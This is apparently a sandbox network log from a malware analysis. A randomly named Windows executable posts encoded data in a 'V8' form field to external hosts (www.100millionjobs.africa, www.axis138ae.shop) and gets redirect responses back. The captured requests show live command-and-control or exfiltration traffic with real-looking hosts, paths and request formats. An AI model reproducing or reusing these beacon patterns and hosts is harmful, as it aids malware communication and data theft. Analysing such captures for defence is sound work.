Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:57.594106913 CET	874	OUT	POST /tw42/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.100millionjobs.africa Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/tw42/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 51 48 68 65 41 30 33 56 54 63 79 63 51 6f 37 2b 42 4d 62 51 5a 71 38 41 34 41 32 6a 69 45 55 68 39 4a 66 4a 2f 79 2f 64 41 77 78 66 4e 42 49 4e 70 4e 2b 5a 37 69 78 51 6d 79 5a 43 30 52 45 6d 57 55 70 61 41 39 49 36 44 64 52 72 4b 54 69 52 75 59 41 6b 32 37 73 30 43 77 6c 55 57 34 4b 64 43 6c 72 75 4a 36 54 36 30 68 34 79 4d 4a 71 33 56 47 62 63 31 41 6a 62 57 59 52 58 78 36 59 32 33 46 43 52 74 6e 52 47 2f 4d 54 41 6c 62 4a 52 76 57 57 66 54 69 45 75 44 32 36 74 75 72 53 73 7a 64 58 79 47 37 45 67 54 32 46 61 56 68 77 76 6b 74 59 6d 47 71 4b 36 64 43 48 74 76 57 4a 45 35 68 6b 41 6e 50 4a 58 42 62 71 72 33 30 61 38 Data Ascii: V8=orBhwzXBa2iiQHheA03VTcycQo7+BMbQZq8A4A2jiEUh9JfJ/y/dAwxfNBINpN+Z7ixQmyZC0REmWUpaA9I6DdRrKTiRuYAk27s0CwlUW4KdClruJ6T60h4yMJq3VGbc1AjbWYRXx6Y23FCRtnRG/MTAlbJRvWWfTiEuD26turSszdXyG7EgT2FaVhwvktYmGqK6dCHtvWJE5hkAnPJXBbqr30a8
Jan 10, 2025 16:43:58.233299971 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 15:43:58 GMT Server: Apache Location: http://maximumgroup.co.za/tw42/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50007	136.243.64.147	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:00.135642052 CET	1891	OUT	POST /tw42/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.100millionjobs.africa Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/tw42/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6f 72 42 68 77 7a 58 42 61 32 69 69 51 48 68 65 41 30 33 56 54 63 79 63 51 6f 37 2b 42 4d 62 51 5a 71 38 41 34 41 32 6a 69 45 63 68 39 36 58 4a 2f 52 6e 64 53 67 78 66 53 78 49 49 70 4e 2b 59 37 68 42 55 6d 7a 6b 35 30 55 49 6d 55 33 78 61 4a 6f 30 36 61 74 52 72 50 6a 69 46 77 6f 41 31 32 37 63 34 43 30 35 55 57 34 4b 64 43 6e 6a 75 41 49 72 36 32 68 35 41 62 35 71 37 44 32 61 4c 31 41 36 73 57 59 6b 31 78 70 51 32 33 6c 53 52 68 30 70 47 67 63 54 4f 6f 37 4a 7a 76 57 61 51 54 69 70 58 44 32 4f 4c 75 73 65 73 69 4c 44 78 44 34 4d 2f 41 58 78 38 57 51 49 43 6d 71 30 6c 4f 4b 61 77 62 31 6a 4e 6d 45 64 6b 76 56 6b 69 68 2b 6f 72 55 36 53 6a 38 67 72 4a 54 33 4d 2b 39 58 31 48 4d 71 56 54 78 77 6e 2f 33 72 4b 4f 4e 6b 73 6c 47 5a 45 59 46 38 4e 6f 6a 6a 50 65 7a 74 46 61 30 38 57 2b 34 6d 69 43 67 36 58 30 57 6d 73 6f 70 35 39 36 50 6b 5a 6b 6a 42 41 68 42 57 51 4c 69 53 69 77 67 77 58 62 4b 32 4b 37 79 34 67 59 59 53 6d 53 4d 46 44 52 45 36 72 6c 63 48 48 76 4b 79 4c 6f 36 79 49 63 55 50 50 [TRUNCATED] Data Ascii: V8=orBhwzXBa2iiQHheA03VTcycQo7+BMbQZq8A4A2jiEch96XJ/RndSgxfSxIIpN+Y7hBUmzk50UImU3xaJo06atRrPjiFwoA127c4C05UW4KdCnjuAIr62h5Ab5q7D2aL1A6sWYk1xpQ23lSRh0pGgcTOo7JzvWaQTipXD2OLusesiLDxD4M/AXx8WQICmq0lOKawb1jNmEdkvVkih+orU6Sj8grJT3M+9X1HMqVTxwn/3rKONkslGZEYF8NojjPeztFa08W+4miCg6X0Wmsop596PkZkjBAhBWQLiSiwgwXbK2K7y4gYYSmSMFDRE6rlcHHvKyLo6yIcUPPu3LtcsN0eUCRRFlqhO5MrWJnFW0m/igfb2r5bywt50fzhDqhAM/SAET0RapCUKGNwfHMOkgho0sfeUq9+2bBD59hDJcraJjykzf+QNZJF/piJWyn0ENgVvqHE+Vdxjt4EIeiBZMvnhmB7TEbgtfCU8K0H9ANIByKaHqkdRj/qH8Ypc+j5+06rqGIbme9ECLZ/IK8QwlCzkt58S4no+3CbRMJMapJ/LG8bSmqi/bjTODDd4QngcbrQvCG/FPk/Baahxk+EK9icnGDI4UHs5aEPzTt5K7VTYe+IreRDnFWz7u5ZSZejjY4UfZ0bWnMu0dAgQlxOvLCjpye6GUmi3wNVRf2VuLQQOSgQcSVsGdu8jc4y6pFgD9Q03dNqx7+L0Zb+zGfXZiYfXE9rZh2rhyOcWOYv16lAzZv+CqRzMTg7yAJxv0JXDFXa6uAlZhkNK9XHHeZCEhd/6Jfyt3UQRmwwqmqPpW24X+h7rENNliWivdC9/sd+jFfTVHL5FnEPMsEG+QLNjFYc4c92wiCIYqchpoMvifiWFqSv6DXrILUiTtYITck7OBXU+7wRlynGwLa0s3+s1AGfRuxJ/DmbA/YvpgP0P9JIAQIlF0gZoqLQk0YvaKN6LKHvPFwmnBvQDkFudQmsGz2RJyZrKSJYZERXpKOkfLmFL8LLY [TRUNCATED]
Jan 10, 2025 16:44:00.768687010 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 15:44:00 GMT Server: Apache Location: http://maximumgroup.co.za/tw42/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50008	136.243.64.147	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:02.694971085 CET	584	OUT	GET /tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.100millionjobs.africa Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:44:03.378036022 CET	801	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 15:44:03 GMT Server: Apache Location: http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa Content-Length: 446 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 74 77 34 32 2f 3f 56 38 3d 6c 70 70 42 7a 48 61 73 47 32 71 33 57 32 67 77 42 45 69 67 4b 73 2b 6c 59 73 2b 43 41 75 58 4b 53 4c 70 76 30 47 76 42 72 77 49 43 31 37 47 66 32 78 4c 61 56 6b 38 36 54 68 77 4a 67 73 65 43 30 44 52 76 6f 78 4a 48 2f 7a 41 73 58 55 35 38 4b 75 55 34 57 2b 70 4b 54 6a 37 4e 73 2f 30 41 33 73 41 70 4d 30 64 51 5a 65 69 39 4f 58 61 43 56 61 32 6a 39 53 6c 61 46 49 6d 6e 63 54 61 44 30 51 3d 3d 26 61 6d 70 3b 42 62 36 68 37 3d 67 42 69 50 76 6e 72 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50009	104.21.48.1	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:16.552077055 CET	833	OUT	POST /j2vs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.axis138ae.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.axis138ae.shop Referer: http://www.axis138ae.shop/j2vs/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 41 73 65 64 6d 4a 4a 41 69 30 61 59 6e 56 42 66 43 4c 76 36 41 59 39 76 67 6f 65 65 71 70 69 76 47 52 72 75 76 63 66 75 78 69 4d 64 30 32 73 7a 38 2f 6f 4a 62 32 47 49 38 61 6e 4b 51 37 32 36 6c 31 36 63 68 42 2f 7a 62 49 32 2b 4f 56 6d 74 74 79 61 70 71 54 32 72 61 68 7a 51 70 64 6a 31 70 64 59 6e 66 61 56 7a 72 4c 52 41 44 38 67 6b 74 63 47 64 55 73 4d 61 6b 33 73 59 54 66 71 46 69 6b 31 58 77 6f 72 68 62 42 4e 72 4e 53 79 68 2f 49 67 51 47 6a 33 49 4c 73 4e 44 33 45 74 71 63 77 6f 58 36 45 45 4d 39 30 68 30 32 63 49 57 42 76 6f 6f 77 57 37 61 74 4f 51 3d Data Ascii: V8=lh6f15sAxB7qAsedmJJAi0aYnVBfCLv6AY9vgoeeqpivGRruvcfuxiMd02sz8/oJb2GI8anKQ726l16chB/zbI2+OVmttyapqT2rahzQpdj1pdYnfaVzrLRAD8gktcGdUsMak3sYTfqFik1XworhbBNrNSyh/IgQGj3ILsND3EtqcwoX6EEM90h02cIWBvoowW7atOQ=
Jan 10, 2025 16:44:17.105659008 CET	1091	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:44:17 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 10 Jan 2025 16:44:17 GMT Location: https://www.axis138ae.shop/j2vs/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQAhbx09aLKxGu9HfgAhbBJ%2BRxfD11UfHMbdhQLqod8WlPGR7GNAPlJOR%2Bw1%2Bn%2Fr8JLzYVGbLimi8oAbVK4I2Hb0Exd2d%2FU0ekXoNqnbwBsmfVsphhOuUoJwNgCCttbQoKUiP4c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ffdc99a58768c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40587&min_rtt=40587&rtt_var=20293&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50010	104.21.48.1	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:19.122030973 CET	853	OUT	POST /j2vs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.axis138ae.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.axis138ae.shop Referer: http://www.axis138ae.shop/j2vs/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 47 50 57 64 6b 75 6c 41 7a 6b 61 66 69 56 42 66 58 37 76 2b 41 59 68 76 67 70 61 4f 71 37 57 76 49 56 37 75 75 5a 2f 75 79 69 4d 64 2b 57 73 38 68 50 6f 53 62 32 4b 71 38 5a 2f 4b 51 37 69 36 6c 78 2b 63 68 79 58 30 64 59 32 47 56 6c 6d 56 6a 53 61 70 71 54 32 72 61 68 57 4c 70 5a 48 31 71 73 6f 6e 65 37 56 73 71 4c 52 48 56 73 67 6b 70 63 47 52 55 73 4d 73 6b 79 52 7a 54 5a 6d 46 69 6d 64 58 78 36 44 69 56 42 4e 70 53 69 7a 68 78 74 64 38 4d 6c 7a 58 4a 66 55 34 73 79 38 53 51 6d 5a 39 67 6d 4d 6b 75 55 4e 4d 6d 50 41 68 51 66 4a 42 71 31 72 71 7a 5a 48 51 4e 4f 53 47 4f 73 42 58 4f 4f 6f 43 36 65 71 49 50 52 6a 55 Data Ascii: V8=lh6f15sAxB7qGPWdkulAzkafiVBfX7v+AYhvgpaOq7WvIV7uuZ/uyiMd+Ws8hPoSb2Kq8Z/KQ7i6lx+chyX0dY2GVlmVjSapqT2rahWLpZH1qsone7VsqLRHVsgkpcGRUsMskyRzTZmFimdXx6DiVBNpSizhxtd8MlzXJfU4sy8SQmZ9gmMkuUNMmPAhQfJBq1rqzZHQNOSGOsBXOOoC6eqIPRjU
Jan 10, 2025 16:44:19.551476955 CET	1081	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:44:19 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 10 Jan 2025 16:44:19 GMT Location: https://www.axis138ae.shop/j2vs/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3pSlD2i%2FGGRFLc2kxr%2B2g49WBiLqUizF65bU43Uzf4GL0HXv369dUMmNNeFNFlzEakp2YB3POadsPdstjzekkSUVsr10ntWmtsPU6KxNP8Z9WtRUNqPdVGbyjaaLQQxTwFRD3M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ffdc9a9dc6a42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=853&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50011	104.21.48.1	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:21.671034098 CET	1870	OUT	POST /j2vs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.axis138ae.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.axis138ae.shop Referer: http://www.axis138ae.shop/j2vs/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6c 68 36 66 31 35 73 41 78 42 37 71 47 50 57 64 6b 75 6c 41 7a 6b 61 66 69 56 42 66 58 37 76 2b 41 59 68 76 67 70 61 4f 71 37 4f 76 49 6e 7a 75 76 34 2f 75 7a 69 4d 64 39 57 73 6f 68 50 70 43 62 32 43 75 38 65 32 6f 51 34 61 36 33 43 32 63 78 44 58 30 54 59 32 47 64 46 6d 75 74 79 62 72 71 54 6e 44 61 68 47 4c 70 5a 48 31 71 75 67 6e 49 61 56 73 6e 72 52 41 44 38 67 6f 74 63 47 39 55 73 55 53 6b 7a 42 46 54 70 47 46 6a 47 74 58 33 4a 72 69 64 42 4e 76 52 69 7a 50 78 74 5a 6a 4d 6c 48 54 4a 63 49 43 73 31 51 53 56 68 77 56 38 6e 63 2b 31 69 74 6a 6b 38 55 79 4f 71 30 6e 6e 57 54 48 76 62 58 79 58 37 71 57 41 5a 4a 70 46 66 56 6f 72 4b 57 4f 47 6c 47 38 6f 4d 4f 31 34 7a 38 55 73 75 32 54 38 6f 47 38 36 4b 63 4e 30 7a 48 36 6f 4c 68 56 59 37 57 72 50 31 71 69 4c 7a 76 6f 36 42 77 46 43 62 4a 72 36 41 54 7a 31 65 43 65 61 74 32 71 32 58 6d 68 72 69 64 67 32 2f 59 35 30 6d 36 55 6d 33 52 58 6d 75 4b 57 64 77 43 70 56 76 68 45 38 4a 54 50 2b 32 71 69 4d 6a 52 7a 54 4b 4b 64 4e 5a 5a 44 72 6f 54 [TRUNCATED] Data Ascii: V8=lh6f15sAxB7qGPWdkulAzkafiVBfX7v+AYhvgpaOq7OvInzuv4/uziMd9WsohPpCb2Cu8e2oQ4a63C2cxDX0TY2GdFmutybrqTnDahGLpZH1qugnIaVsnrRAD8gotcG9UsUSkzBFTpGFjGtX3JridBNvRizPxtZjMlHTJcICs1QSVhwV8nc+1itjk8UyOq0nnWTHvbXyX7qWAZJpFfVorKWOGlG8oMO14z8Usu2T8oG86KcN0zH6oLhVY7WrP1qiLzvo6BwFCbJr6ATz1eCeat2q2Xmhridg2/Y50m6Um3RXmuKWdwCpVvhE8JTP+2qiMjRzTKKdNZZDroT2uAFi4McpEzDmx34EzUsIii7/XR0mV5MRYtNmbtc39M5tKhfOqLswfumMpF0cZF+qL3ZiDBvH997t9xfyjotMWERSFUsDEEc2Y74mlP0igbnuNINXeC78XE1sQOtR6uCn7RnmA3LHnHv8AeD8loBrYftx0W8wvB3jjQ+pspYmlyU1BSucitGbJfFLHubzL8eA7dLKA2407JYMNzDB0fIYVX0E2IYdXzi25LevT5AWQb0CiHTogXy0pcGOmWn/MBOdwFFK3Yd6wWxHiOscvge1RAs2UosRA4iDLbf9ZipxFrk9lKWmOI6Qt2LDs56XRi7vqZ8lTSfmsemInyvU2+vtVfXjCFvCP7JyPDlho7tm2m6ZD/pZbgJgOO+mLxSkQAZKqIunRDeCGig/kT+CMahM+G9Fe2ZX2vWOU/6z0+1JALnR9XdVWHHAN2gB4zUzuRWG47JecBKhNEWxD9AF1FW3czBzr60wefxm6ew++5dK7dzvmvN72lCqup1yuXXRrYwWj0AOJAU7xk7yO00lgVW1lEobuwxK9Hp+aQvxa++TqUqZiRFfY1CST9TO8c3m5P24wvD5Eh9ym7/H8M/nHCn71Mx8ZRV3V1Oq6jGfxHQ7VUuffI1S/sTKyMTNXEkszqzsZ85ShJBG3aLI9WKzeo6Q1efDlN91MaVmy [TRUNCATED]
Jan 10, 2025 16:44:22.126920938 CET	1082	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:44:22 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 10 Jan 2025 16:44:22 GMT Location: https://www.axis138ae.shop/j2vs/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHv68tVpKHprZd3Lzo47AgpqSgTnMgQxXj%2B9sQzkGWBih3TddwvKqX02I7lGUjOfscAaE7Up7MJCJR3OlztaQrBDdCfR12Cm1wCvLfzYkAUxUlwmgvx5ztWB0am5s%2FFkZbPhETQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ffdc9b9ed6c43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1870&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 